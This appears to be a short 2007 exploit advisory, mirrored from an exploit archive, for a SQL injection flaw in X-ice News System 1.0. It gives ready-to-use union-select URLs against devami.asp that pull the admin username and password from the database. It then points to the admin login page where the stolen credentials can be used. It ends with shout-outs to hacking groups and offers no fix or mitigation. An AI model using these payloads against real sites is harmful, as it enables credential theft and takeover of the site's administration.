id: 1580
date: 03/13/2007
title: X-ice News System 1.0 (devami.asp id) SQL Injection Vulnerability
author: CyberGhost
cves: 

=================================================================
X-ice News System 1.0 (devami.asp id) SQL Injection Vulnerability
=================================================================



Title  : X-ice News System v1.0 Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page   : http://www.x-ice.org/haber%5Fv1/

Vuln.

Username : /devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
Password : /devami.asp?id=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

Login : /admin/kontrol.asp

====================================

Thanx : redLine - Hackinger - LiarHack - excellance - SaCReD SeeR - MaTRaX - by_emR3 - kerem125 - Bolivar - All TiTHaCK Members

And All TURKISH HACKERS !




#  0day.today [2023-03-23]  #